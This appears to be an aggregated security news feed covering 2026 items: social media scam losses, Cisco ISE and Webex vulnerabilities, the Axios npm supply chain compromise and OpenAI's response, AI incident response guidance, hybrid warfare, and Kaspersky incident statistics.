Visualização de leitura

U.S. Consumers Lost $2.1 Billion in Social Media Scams in 2025, FTC Says

An FTC report says that Americans last year lost $2.1 billion in social media scams, such as shopping and investment schemes. Social media site have become the place where most of these scams start, and more than half of that money was stolen in scams began on Facebook, WhatsApp, and Instagram.

The post U.S. Consumers Lost $2.1 Billion in Social Media Scams in 2025, FTC Says appeared first on Security Boulevard.

China-Backed Groups are Using Massive Botnets in Espionage, Intrusion Campaigns

Chinese, A PRC flag flies atop a metal flagpole

China-sponsored threat groups like Salt Typhoon and Flax Typhoon are increasingly relying on multiple massive botnets comprising edge and IoT devices to run their cyber espionage and network intrusion campaigns, CISA and other security agencies say. The use of such "covert networks" makes it more difficult to detect and mitigate their campaigns.

The post China-Backed Groups are Using Massive Botnets in Espionage, Intrusion Campaigns appeared first on Security Boulevard.

Cisco Patches Critical ISE Vulnerabilities Allowing Remote Code Execution Attacks

Cisco ISE vulnerabilities

Cisco has released security updates to fix multiple vulnerabilities in its Identity Services Engine and Webex Services, warning that successful exploitation could lead to remote code execution, root-level access, and user impersonation. The Cisco ISE vulnerabilities affect widely used enterprise authentication and collaboration systems, making patching a priority for organizations. The Cisco ISE vulnerabilities and the Webex Services flaw have not been observed in active exploitation so far. However, the company has urged customers to update affected systems immediately to reduce risk exposure.

Critical Cisco ISE Vulnerabilities Enable Remote Code Execution

The most severe issues impact Cisco Identity Services Engine (ISE) and its Passive Identity Connector (ISE-PIC). These Cisco ISE vulnerabilities stem from insufficient validation of user-supplied input, a flaw that allows attackers to send specially crafted HTTP requests to targeted systems. Among them, CVE-2026-20147 carries a CVSS score of 9.9 and allows an authenticated attacker with administrative credentials to execute arbitrary commands on the underlying operating system. According to Cisco, this could enable attackers to gain user-level access and then escalate privileges to root. Two additional vulnerabilities, CVE-2026-20180 and CVE-2026-20186, also rated 9.9, allow attackers with read-only administrative access to execute arbitrary commands. These Cisco ISE vulnerabilities highlight how even limited privileges can be leveraged for deeper system compromise. Cisco noted that exploitation in single-node deployments could disrupt services entirely, potentially leading to a denial-of-service condition where new endpoints cannot authenticate to the network.

Webex Services Flaw Risks User Impersonation

Alongside the Cisco ISE vulnerabilities, a critical issue has been identified in Cisco Webex Services. Tracked as CVE-2026-20184 with a CVSS score of 9.8, the flaw affects single sign-on integration with Control Hub. This vulnerability is caused by improper certificate validation and could allow an unauthenticated remote attacker to impersonate any user within the service. Successful exploitation could result in unauthorized access to legitimate Webex accounts, raising concerns for enterprises relying on the platform for communication and collaboration.

Affected Versions and Exposure

The Cisco ISE vulnerabilities impact multiple versions of the platform. All Cisco ISE versions 3.5 and earlier are affected by CVE-2026-20147, while versions 3.4 and earlier are vulnerable to CVE-2026-20180 and CVE-2026-20186. Cisco ISE-PIC systems are also impacted regardless of configuration. For Webex Services, the vulnerability affects deployments using SSO integration with Control Hub. Cisco emphasized that the vulnerabilities are independent of each other, meaning exploitation of one does not require another. Some versions may be affected by specific flaws while not impacted by others.

No Workarounds Available, Patching is Essential

Cisco has confirmed that there are no workarounds to mitigate these vulnerabilities. Organizations must apply the available software updates to fully address the risks. Fixed releases have been issued across supported versions. For example, patches include ISE 3.1 Patch 11, 3.2 Patch 10, 3.3 Patch 11, 3.4 Patch 6, and 3.5 Patch 3. Systems running versions earlier than 3.1 are advised to migrate to a supported release. Security teams are also advised to review system configurations and ensure that upgrade prerequisites such as hardware compatibility and memory requirements are met before deployment.

No Active Exploitation Reported But Risk Remains High

The Cisco Product Security Incident Response Team has stated that it is not aware of any public exploitation or malicious use of these vulnerabilities at the time of disclosure. The issues were reported by Jonathan Lein of TrendAI Research. Despite the lack of active attacks, the severity of the Cisco ISE vulnerabilities and the Webex flaw places them in a high-risk category. Vulnerabilities that allow remote code execution or user impersonation are often targeted quickly once technical details become public.

Security Implications for Enterprises

The Cisco ISE vulnerabilities are particularly significant because ISE plays a central role in network access control, authentication, and policy enforcement. A compromise could provide attackers with deep visibility and control over enterprise networks. Similarly, the Webex vulnerability introduces risks to identity and access management, especially in environments that rely on SSO for centralized authentication. Organizations using affected products are advised to prioritize patching, restrict administrative access where possible, and monitor systems for suspicious activity. Cisco has made detailed advisories and upgrade guidance available through its security portal, and customers are encouraged to follow official recommendations to secure their environments.

NIST, Overrun by Massive Numbers of Submitted CVEs, Limits Analysis Work

NIST CSF vulnerabilities ransomware backlog

NIST said it overwhelmed by the surge in the number of CVEs submissions in recent years, so it is paring back the analysis work it does on the dangerous security flaws. Security experts say the number of new vulnerabilities detected will only grow during the AI era and that the private sector will need to pick up the slack left by NIST's decision.

The post NIST, Overrun by Massive Numbers of Submitted CVEs, Limits Analysis Work appeared first on Security Boulevard.

Incident response for AI: Same fire, different fuel

When a traditional security incident hits, responders replay what happened. They trace a known code path, find the defect, and patch it. The same input produces the same bad output, and a fix proves it will not happen again. That mental model has carried incident response for decades.

AI breaks it. A model may produce harmful output today, but the same prompt tomorrow may produce something different. The root cause is not a line of code; it is a probability distribution shaped by training data, context windows, and user inputs that no one predicted. Meanwhile, the system is generating content at machine speed. A gap in a safety classifier does not leak one record. It produces thousands of harmful outputs before a human reviewer sees the first one.

Fortunately, most of the fundamentals that make incident response (IR) effective still hold true. The instincts that seasoned responders have developed over time still apply: prioritizing containment, communicating transparently, and learning from each.

AI introduces new categories of harm, accelerates response timelines, and calls for skills and telemetry that many teams are still developing. This post explores which practices remain effective and which require fresh preparation.

The fundamentals still hold

The core insight of crisis management applies to AI without modification: the technical failure is the mechanism, but trust is the actual system under threat. When an AI system produces harmful output, leaks training data, or behaves in ways users did not expect, the damage extends beyond the technical artifact. Trust has technical, legal, ethical, and social dimensions. Your response must address all of them, which is why incident response for AI is inherently cross-functional.

Several established principles transfer directly.

Explicit ownership at every level. Someone must be in command. The incident commander synthesizes input from domain experts; they do not need to be the deepest technical expert in the room. What matters is that ownership is clear and decision-making authority is understood.

Containment before investigation. Stop ongoing harm first. Investigation runs in parallel, not after containment is complete. For AI systems, this might mean disabling a feature, applying a content filter, or throttling access while you determine scope.

Escalation should be psychologically safe. The cost of escalating unnecessarily is minor. The cost of delayed escalation can be severe. Build a culture where raising a flag early is expected, not penalized.

Communication tone matters as much as content. Stakeholders tolerate problems. They cannot tolerate uncertainty about whether anyone is in control. Demonstrate active problem-solving. Be explicit about what you know, what you suspect, and what you are doing about each.

These principles are tested, and they are effective in guiding action. The challenge with AI is not that these principles no longer apply; it is that AI introduces conditions where applying them requires new information, new tools, and new judgment.

Where AI changes the equation

Non-determinism and speed are the headline shifts, but they are not the only ones.

New harm types complicate classification and triage. Traditional IR taxonomies center on confidentiality, integrity, and availability. AI incidents can involve harms that do not fit those categories cleanly: generating dangerous instructions, producing content that targets specific groups, or enabling misuse through natural language interfaces. By making advanced capabilities easy to use, these interfaces enable untrained users to perform complex actions, increasing the risk of misuse or unintended harm. This is why we need an expanded taxonomy. If your incident classification system lacks categories for these harms, your triage process will default to “other” and lose signal.

Severity resists simple quantification. A model producing inaccurate medical information is a different severity than the same model producing inaccurate trivia answers. Good severity frameworks guide judgment; they cannot replace it. For AI incidents, the context around who is affected and how they are affected carries more weight than traditional security metrics alone can capture.

Root cause is often multi-dimensional. In traditional incidents, you find the bug and fix it. In AI incidents, problematic behavior can emerge from the interaction of training data, fine-tuning choices, user context, and retrieval inputs. Investigation may narrow the contributing factors without isolating one defect. Your process must accommodate that ambiguity rather than stalling until certainty arrives.

Before the crisis is the time to work through these implications. The questions that matter: How and when will you know? Who is on point and what is expected of them? What is the response plan? Who needs to be informed, and when? Every one of these questions that you answer before the incident is time you buy during it.

Closing the gaps in telemetry, tooling, and response

If AI changes the nature of incidents, it also changes what you need to detect and respond to them.

Observability is the first gap. Traditional security telemetry monitors network traffic, authentication events, file system changes, and process execution. AI incidents generate different signals: anomalous output patterns, spikes in user reports, shifts in content classifier confidence scores, unexpected model behavior after an update. Many organizations have not yet instrumented AI systems for these signals and, without clear signal, defenders may first learn about incidents from social media or customer complaints. Neither provides the early warning that effective response requires.

AI systems are built with strong privacy defaults – minimal logging, restricted retention, anonymized inputs – and those same defaults narrow the forensic record when you need to establish what a user saw, what data the model touched, or how an attacker manipulated the system. Privacy-by-design and investigative capability require deliberate reconciliation before an incident, because that decision does not get easier once the clock is running.

AI can also help close these gaps. We use AI in our own response operations to enhance our ability to:

  • Detect anomalous outputs as they occur
  • Enforce content policies at system speed
  • Examine model outputs at volumes no human team can match
  • Distill incident discussions so responders spend time deciding rather than reading
  • Coordinate across response workstreams faster than email chains allow

Staged remediation reflects the reality of AI fixes. Incidents require both swift action and thorough review. A model behavior change or guardrail update may not be immediately verifiable in the way a traditional patch is. We use a three-stage approach:

  • Stop the bleed. Tactical mitigations: block known-bad inputs, apply filters, restrict access. The goal is reducing active harm within the first hour.
  • Fan out and strengthen. Broader pattern analysis and expanded mitigations over the next 24 hours, covering thousands of related items. Automation is essential here; manual review cannot keep pace.
  • Fix at the source. Classifier updates, model adjustments, and systemic changes based on what investigation revealed. This stage takes longer, and that is acceptable. The first two stages bought time.

One practical tip: tactical allow-and-block lists are a necessary triage tool, but they are a losing proposition as a permanent solution. Adversaries adapt. Classifiers and systemic fixes are the durable answer.

Watch periods after remediation matter more for AI than for traditional patches. Because model behavior is non-deterministic, verification relies on sustained testing and monitoring across varied conditions rather than a single test pass. Sustained monitoring after each stage confirms that the remediation holds under varied conditions.

The human dimension

There is a dimension of AI incident response that traditional IR addresses unevenly and that AI makes urgent: the wellbeing of the people doing the work.

Defenders handling AI abuse reports and safety incidents are routinely exposed to harmful content. This is not the same cognitive load as analyzing malware samples or reviewing firewall logs. Exposure to graphic, violent, or exploitative material has measurable psychological effects, and extended incidents compound that exposure over days or weeks.

Human exhaustion threatens correctness, continuity, and judgment in any prolonged incident. AI safety incidents place an additional emotional burden on responders due to exposure to distressing content. Recognizing and addressing this challenge is essential, as it directly impacts the well-being of the team and the quality of the response.

What helps:

  • Talk to your team about well-being before the crisis, not during it.
  • Manager-sponsored interventions during extended response work, including scheduled breaks, structured handoffs, and deliberate activities that provide cognitive relief.
  • Some teams use structured cognitive breaks, including visual-spatial activities, to reduce the impact of prolonged exposure to harmful content.
  • Coaching and peer mentoring programs normalize the impact rather than framing it as individual weakness.
  • Leveraging proven practices from safety content moderation teams, whose operational workflows for content review and escalation map directly to AI security moderation is a natural collaboration opportunity.

If your incident response plan does not account for the humans executing it, the plan is incomplete.

Looking ahead

Incident response for AI is not a solved problem. The threat surface is evolving as models gain new capabilities, as agentic architectures introduce autonomous action, and as adversaries learn to exploit natural language at scale. The teams that will handle this well are the ones building adaptive capacity now. Extend playbooks. Instrument AI systems for the right signals. Rehearse novel scenarios. Invest in the people who will be on the front line when something breaks. Good response processes limit damage. Great ones make you stronger for the next incident.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Incident response for AI: Same fire, different fuel appeared first on Microsoft Security Blog.

OpenAI Responds to Axios npm Supply Chain Attack, Rotates macOS Certificates

Axios npm supply chain attack

The fallout from the Axios npm supply chain attack continues to widen, with OpenAI issuing a detailed response outlining its exposure and remediation steps. The Axios npm supply chain attack, reported by The Cyber Express on April 1, has since been linked to North Korea’s Lazarus Group, significantly expanding the scope and impact of the incident. Attribution was confirmed by Google Threat Intelligence Group, which identified the activity under UNC1069, a financially motivated group active since at least 2018.

OpenAI Confirms Limited Exposure to Axios npm Supply Chain Attack

In its official statement, OpenAI said, “We recently identified a security issue involving a third-party developer tool, Axios, that was part of a widely reported, broader industry incident⁠.” The company clarified that while it was affected by the broader Axios npm supply chain attack, there is no evidence of compromise to user data or internal systems. “We found no evidence that OpenAI user data was accessed, that our systems or intellectual property was compromised, or that our software was altered,” the statement added. The exposure occurred on March 31, 2026, when a GitHub Actions workflow used in OpenAI’s macOS app-signing process executed a malicious version of Axios (v1.14.1). This workflow had access to sensitive code-signing certificates used for validating OpenAI applications like ChatGPT Desktop, Codex, Codex CLI, and Atlas.

Certificate Rotation and macOS App Updates

As a direct response to the Axios npm supply chain attack, OpenAI has initiated a full rotation of its macOS code-signing certificates. While internal analysis suggests the certificate was likely not exfiltrated, the company is treating it as potentially compromised. To mitigate any residual risk, OpenAI is requiring users to update their macOS applications. Older versions of affected apps will lose support and functionality after May 8, 2026. Updated versions will carry new certificates to ensure authenticity. This move is designed to prevent threat actors from distributing malicious software disguised as legitimate OpenAI applications, a known risk in supply chain attacks involving code-signing materials.

Investigation and Security Measures

OpenAI engaged a third-party digital forensics and incident response firm to investigate the impact of the Axios npm supply chain attack. The company also coordinated with Apple to block any new notarization attempts using the old certificate. Additional steps taken include:
  • Publishing new builds of all affected macOS applications
  • Reviewing all past software notarizations for anomalies
  • Ensuring no unauthorized modifications were made to distributed software
The company confirmed that no malicious applications signed with its certificate have been identified so far.

Root Cause: GitHub Workflow Misconfiguration

The root cause of OpenAI’s exposure to the Axios npm supply chain attack was traced to a misconfiguration in its GitHub Actions workflow. Specifically, the workflow relied on a floating tag instead of a fixed commit hash and lacked a minimum release age for dependencies, both of which increased the risk of pulling compromised packages. This highlights a broader industry issue where development pipelines remain vulnerable to upstream compromises, especially in open-source ecosystems.

No Impact on User Data or Other Platforms

OpenAI emphasized that the incident is limited strictly to macOS applications. There is no impact on iOS, Android, Windows, Linux, or web-based services. The company also reassured users:
  • No user data or API keys were compromised
  • No passwords need to be changed
  • No malware signed as OpenAI has been detected

What Happens Next

OpenAI will fully revoke the old certificate on May 8, 2026, after a 30-day transition window. This approach is intended to minimize disruption while ensuring users have adequate time to update their applications. The company noted that any software signed with the old certificate will be blocked by macOS security protections after revocation, further reducing the risk of misuse.

Growing Impact of Axios npm Supply Chain Attack

The Axios npm supply chain attack highlight the escalating risks tied to third-party software dependencies. With attribution pointing to a state-sponsored group, the incident reflects how supply chain attacks are increasingly being leveraged for financial and strategic objectives. As organizations continue to rely heavily on open-source libraries, the incident serves as a reminder of the need for stricter dependency management, secure development practices, and continuous monitoring of software pipelines.

SIEM Detection is Failing. Here’s What Stronger Teams Do Instead. 

cost, visibility, SIEM model, data, SIEM, teams, Elastic SIEM LogPoint security employees

Stop running your SOC like it’s 2012. Learn why modern detection engineering requires shifting away from legacy SIEM architectures toward a product-centric strategy that prioritizes data quality, contextual enrichment, and AI-native workflows over raw log volume.

The post SIEM Detection is Failing. Here’s What Stronger Teams Do Instead.  appeared first on Security Boulevard.

Hasbro Cyberattack Knocks Systems Offline, Recovery Could Take Weeks

Hasbro is investigating a cyberattack that forced systems offline, warning recovery could take weeks as it works to contain the incident and assess the impact.

The post Hasbro Cyberattack Knocks Systems Offline, Recovery Could Take Weeks appeared first on TechRepublic.

Hybrid Warfare 2026: When Cyber Operations and Kinetic Attacks Converge

Hybrid Warfare

In 2026, hybrid warfare is no longer a theoretical construct discussed in policy circles; it is shaping geopolitical conflict in real time. The convergence of cyber warfare and kinetic attacks has transformed how nations project power, blending missiles, malware, and misinformation into unified campaigns. What distinguishes modern hybrid warfare from earlier conflicts is not just the presence of digital operations, but their synchronization with physical strikes to produce layered, systemic disruption. 

Nowhere is this more evident than in the Middle East, where escalating tensions have turned the region into a proving ground for cyber-physical warfare. Governments, energy systems, financial networks, and communication infrastructures are being targeted simultaneously, exposing vulnerabilities that extend far beyond national borders. The result is a battlespace where the frontlines are both physical and invisible, and where disruption can ripple globally within hours. 

From Conflict to Convergence: The Rise of Cyber Physical Warfare 

The turning point came on February 28, 2026, when coordinated military and cyber campaigns marked a new phase in hybrid war strategy. Joint operations combined airstrikes with cyberattacks, information warfare, and psychological operations, targeting nuclear facilities, military assets, and digital infrastructure in parallel. Internet connectivity in targeted regions dropped to as low as 1–4% of normal levels during the initial assault, demonstrating the effectiveness of integrated cyber warfare and kinetic attacks. 

These operations were not designed for immediate destruction alone. Instead, they aimed to disorient command structures, disrupt civilian communication, and weaken public trust. Digital interference extended to media channels and widely used mobile applications, some of which were compromised to spread false information and induce panic. 

The response was equally multifaceted. Within 72 hours, missile and drone strikes were accompanied by a surge in cyber activity, including spear-phishing campaigns, ransomware-style attacks, and coordinated data exfiltration efforts targeting energy grids, airports, and financial institutions. 

Hacktivists as Force Multipliers in Modern Hybrid Warfare 

One of the defining characteristics of modern hybrid warfare is the role of non-state actors. More than 70 hacktivist groups became active participants in the 2026 conflict, blurring the lines between state-sponsored operations and independent cyber activism. These groups executed distributed denial-of-service (DDoS) attacks, website defacements, and credential harvesting campaigns across multiple countries. 

Their involvement amplifies the scale and unpredictability of cyber warfare and kinetic attacks. While some groups operate with ideological motivations, others appear loosely aligned with state objectives, acting as force multipliers without formal attribution. This ambiguity complicates response strategies and increases the risk of escalation. 

Cyber campaigns emerged during this period, including fake missile alert applications designed to harvest sensitive user data such as contacts, messages, and device identifiers. These tools demonstrated a level of technical refinement typically associated with advanced persistent threat (APT) groups. 

Iranian Cyber Capabilities and Strategic Depth 

Despite early disruptions to its infrastructure, Iran maintained a good cyber posture throughout the conflict. Established threat groups continued to conduct espionage, infrastructure attacks, and credential theft operations targeting sectors such as energy, aviation, and telecommunications. 

Parallel to these efforts, Iran-aligned hacktivist groups escalated disruptive campaigns, including industrial control system intrusions and data leaks. Some reports suggest coordination with Russia-linked actors. 

A notable example is the emergence of hybrid threat actors employing destructive malware. Tools designed to overwrite system data, disable operating systems, and erase critical infrastructure highlight a shift toward more aggressive cyber physical warfare tactics. These operations are often executed in stages: initial access through phishing or exposed services, lateral movement using legitimate system tools, and eventual payload deployment designed for maximum disruption. 

Infrastructure Disruption and Global Spillover Effects 

The consequences of hybrid warfare are not confined to the immediate conflict zone. Early incidents in 2026 disrupted fuel distribution in Jordan and interfered with navigation systems, affecting over 1,100 vessels near the Strait of Hormuz. These disruptions pose significant risks to global oil and gas supply chains, illustrating how localized cyber warfare and kinetic attacks can have worldwide economic implications. 

Countries like India are experiencing indirect exposure due to interconnected digital ecosystems. Supply chain dependencies, shared technologies, and cloud-based services create pathways for cyber threats to propagate across borders. Vulnerabilities in widely used platforms, including VPNs and enterprise communication systems, are actively exploited. 

Attackers are also leveraging AI-driven techniques to enhance their effectiveness. Phishing campaigns now use highly personalized messaging, while automated reconnaissance tools map organizational structures to identify high-value targets. These capabilities reduce the time required to execute complex attacks and increase their success rates. 

Cybercrime Exploitation in a Hybrid War Environment 

Geopolitical instability has created fertile ground for cybercriminal activity. More than 8,000 domains linked to the 2026 conflict have been registered, many serving as platforms for scams, malware distribution, and misinformation campaigns. 

Examples include fake donation websites, fraudulent e-commerce platforms, and cryptocurrency schemes designed to exploit public sentiment. Conflict-themed malware, often disguised as alert systems or news updates, has been used to deploy backdoors and establish persistent access to compromised systems. 

This convergence of cybercrime and state-aligned activity reflects a broader trend: the industrialization of cyber threats. Ransomware-as-a-service platforms now provide end-to-end attack capabilities, lowering the barrier to entry for less experienced actors. With subscription costs as low as $500 per month, cyberattacks are becoming accessible. 

India’s Evolving Role in the Hybrid Warfare Landscape 

India’s cybersecurity environment in 2026 reflects many of the same dynamics observed in the Middle East. State-sponsored actors are focusing on long-term access and intelligence gathering, targeting government networks, defense systems, and critical industries. These operations often remain undetected for extended periods, leveraging advanced persistent techniques to maintain access. 

At the same time, hacktivist groups in India are becoming more organized and technically capable. Their activities now include coordinated data leaks, disruption campaigns, and the use of advanced tools traditionally associated with nation-state actors. 

Supply chain attacks are a growing concern, particularly in sectors undergoing rapid digital transformation. Healthcare, manufacturing, and financial services are vulnerable due to their reliance on interconnected systems. These vulnerabilities highlight the importance of continuous monitoring, vendor risk management, and layered security architectures. 

Intelligence-Driven Defense in the Age of Hybrid War Strategy 

As hybrid warfare evolves, traditional reactive security models are proving insufficient. Organizations are shifting toward intelligence-driven approaches that integrate tactical, operational, strategic, and technical insights. 

This shift is critical in a landscape where attackers exploit legitimate platforms, use “living off the land” techniques, and maintain persistence for extended periods. Behavioral analytics, anomaly detection, and contextual authentication are becoming essential tools for identifying threats that bypass conventional defenses. 

Equally important is the adoption of proactive measures such as multi-factor authentication, network segmentation, and robust incident response frameworks. Information sharing between organizations and governments is also emerging as a key component of resilience in the face of coordinated cyber warfare and kinetic attacks. 

Conclusion 

Hybrid warfare in 2026 is an operational reality. Cyber warfare and kinetic attacks now work in tandem, creating rapid, high-impact disruptions across both digital and physical systems. This is the core of modern hybrid warfare: fast, coordinated, and difficult to contain. 

Defending against this requires a shift to intelligence-led security. In a landscape shaped by cyber physical warfare, organizations need real-time visibility, faster response, and the ability to anticipate threats, not just react to them. Cyble enables this shift with its AI-native platform, Cyble Blaze AI, designed to predict and stop threats before they escalate. 

Strengthen your hybrid war strategy, explore Cyble’s threat intelligence capabilities or schedule a demo to see proactive security in action. 

References:

The post Hybrid Warfare 2026: When Cyber Operations and Kinetic Attacks Converge appeared first on Cyble.

Anatomy of a Cyber World Global Report 2026

Kaspersky Security Services provide a comprehensive cybersecurity ecosystem, taking enterprise threat protection to another level. Services like Kaspersky Managed Detection and Response and Compromise Assessment allow for timely detection of threats and cyberattacks. SOC Consulting provides a practical approach ensuring the corporate infrastructure stays secured, while Incident Response is suited for timely remediation with a maximized recovery rate.

High-level overview of the MDR, IR and CA connection

High-level overview of the MDR, IR and CA connection

This new report brings together statistics across regions and industries from our Managed Detection and Response and Incident Response services, and for the first time, it also includes insights from our Compromise Assessment and SOC Consulting services — all to provide you with more comprehensive view of different aspects of corporate information security worldwide.

The scope of MDR and IR services

Provision of Kaspersky’s MDR and IR services follows a global approach. The majority of customers accounted for the CIS (34.7%), the Middle East (20.1%), and Europe (18.6%).

Distribution of customers by geographical region, 2025

Distribution of customers by geographical region, 2025

MDR telemetry

Following the previous year’s numbers, in 2025, the MDR infrastructure received and processed an average of 15,000 telemetry events per host every day, generating security alerts as a result. These alerts are first processed by AI-powered detection logic, after which Kaspersky SOC analysts handle them as required. Overall, a total of approximately 400,000 alerts were generated in 2025. After counting out false positives, 39,000 alerts were further investigated.

MDR telemetry statistics, 2025

MDR telemetry statistics, 2025

Incident statistics

The distribution of remediation requests by industry has slightly changed as compared to previous years’ pattern. Government (18.5%) and industrial (16.6%) organizations are still the most targeted industries in regards to cyberattacks that require incident response activities. However, this year, the IT sector saw a growth in the number of IR requests, eventually being placed third in the overall industry distribution rankings and thus replacing financial organizations, which were targeted less often than in 2024. This is equally true for smaller-scale attacks that can be contained and remediated through automated means — the only difference is that medium- and low-severity incidents are more often experienced by financial organizations.

Distribution of all incidents by industry sector, 2025

Distribution of all incidents by industry sector, 2025

Key trends and statistics

This section presents key findings and trends in cyberattacks in 2025:

  • The number of high-severity incidents decreased, following a downward trend that we’ve been observing since 2021. The majority of those incidents account for APT attacks and red teaming exercises, which indicates two landscape trends. On the one hand, skilled adversaries make efforts to increase impact, while on the other, organizations spend more resources on probing their defense systems.
  • The most common vulnerabilities exploited in the wild were related to Microsoft products. Half of all identified CVEs led to remote code execution, notably without authentication in some cases.
  • Exploitation of public-facing applications, valid accounts, and trusted relationships remain the most popular initial vectors, and their overall share has increased, accounting to over 80% of all attacks in 2025. In particular, attacks through trusted relationships are evolving: their share has increased to 15.5% from 12.8% in 2024. They are also becoming more complex: for instance, we witnessed a case where adversaries had compromised more than two organizations in sequence to ultimately gain access to a third target.
  • Standard Windows utilities remain a popular LotL tool. Adversaries use those to minimize the risk of detection during delivery to a compromised system. The most popular LOLBins we observed in high-severity incidents were powershell.exe (14.4%), rundll32.exe (5.9%), and mshta.exe (3.8%). Among the most popular legitimate tools used in incidents we flag Mimikatz (14.3%), PowerShell (8.1%), PsExec (7.5%), and AnyDesk (7.5%).

The full 2026 Global Report provides additional information about cyberattacks, including real-world cases discovered by Kaspersky experts. We also describe SOC Consulting projects and Compromise Assessment requests. The report includes comprehensive analysis of initial attack vectors in correlation with the MITRE ATT&CK tactics and techniques and the full list of vulnerabilities that we detected during Incident Response engagements.

Prevention is the Only Cloud Security Strategy That Works 

EASM, breach, attacks data breach supply chain healthcare

In the evolving digital economy, adopting a prevention-first strategy for cloud workflows is essential. This article explores the importance of preemptive security measures to protect sensitive operations from breaches, detailing steps for organizations to enhance their security posture.

The post Prevention is the Only Cloud Security Strategy That Works  appeared first on Security Boulevard.

FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System

SEC rules, cybersecurity, SEC cyber data breach rules

The FBI, CISA, and NSA reportedly are investigating the hack by an unnamed "sophisticated" actor of a FBI surveillance system that holds sensitive information. The breach carries the hallmarks of Chinese nation-state groups and comes amid concerns about attacks in the wake of the war against Iran and the shrinking of the federal cybersecurity apparatus.

The post FBI is Investigating the ‘Sophisticated’ Hack of Its Surveillance System appeared first on Security Boulevard.

❌